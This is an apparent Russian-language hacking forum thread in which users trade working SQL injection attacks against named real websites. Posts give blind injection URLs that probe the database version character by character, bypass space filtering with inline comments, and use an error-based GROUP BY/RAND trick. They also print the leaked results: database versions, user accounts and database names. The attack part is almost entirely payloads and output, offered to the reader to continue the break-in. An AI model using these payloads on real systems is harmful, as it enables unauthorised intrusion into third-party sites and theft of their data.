Сообщение от
justonline
http://neoncolor.ru/catalog/?gr=18'
Фильтруется вообще куча всего, проще перечислить что не фильтруется =)
(
substringкстати фильтруется тоже, чего не скажешь о
substr)
Но тем не менее...
Для вывода версии юзал так
Код:
http://neoncolor.ru/catalog/?s=2&gr=642+and+ascii(lower(substr(@@version,1,1)))=53
Ну или более экзотический вариант
Код:
ttp://neoncolor.ru/catalog/?s=2&gr=642+and+right(left(@@version,1),1)=5
Version = 5.0.77
@@user и user() фильтруется, точно также обстоит дело и с именами БД.
Сообщение от
M_script
зато connection_id() знает, так что мускул
http://neoncolor.ru/catalog/?gr=18+and+connection_id()=connection_id()
Абсолютно солидарен с товарищем - перед слепой инъекцией не поленитесь проверить с какой СУБД имеем дело, например руководствуясь уникальными функциями каждой СУБД
этого поста
Сообщение от
justonline
http://xao.ru/review'
тут дело обстоит намного проще - фильтруется пробелы - юзай /**/
Код:
http://xao.ru/review'/**/OR/**/(SELECT/**/COUNT(*)/**/FROM/**/(SELECT/**/1/**/UNION/**/SELECT/**/2/**/UNION/**/SELECT/**/3)x/**/GROUP/**/BY/**/MID(VERSION(),FLOOR(RAND(0)*2),64))/**/and/**/1='1
Duplicate entry '
5.0.77-log' for key 1
User = 'cl61392_xaoruweb@localhost'
Database = 'cl61392_xaoruweb'
Сообщение от
justonline
http://oring.com.ua
Прикольная скуля, не сразу додумался в каком параметре искать... Хоть бы указал...
Ну вот держи вектор атаки
Код:
http://oring.com.ua/products/uponor-wirsbo/truba1.php'/**/OR/**/(SELECT/**/COUNT(*)/**/FROM/**/(SELECT/**/1/**/UNION/**/SELECT/**/2/**/UNION/**/SELECT/**/3)x/**/GROUP/**/BY/**/MID(VERSION(),FLOOR(RAND(0)*2),64))/**/and/**/1='1
Duplicate entry '
4.1.21-standard' for key 1
Version = 4.1.21-standard
User = oring_com_ua@localhost
Database = oring_com_ua
Дальше сам справишься?)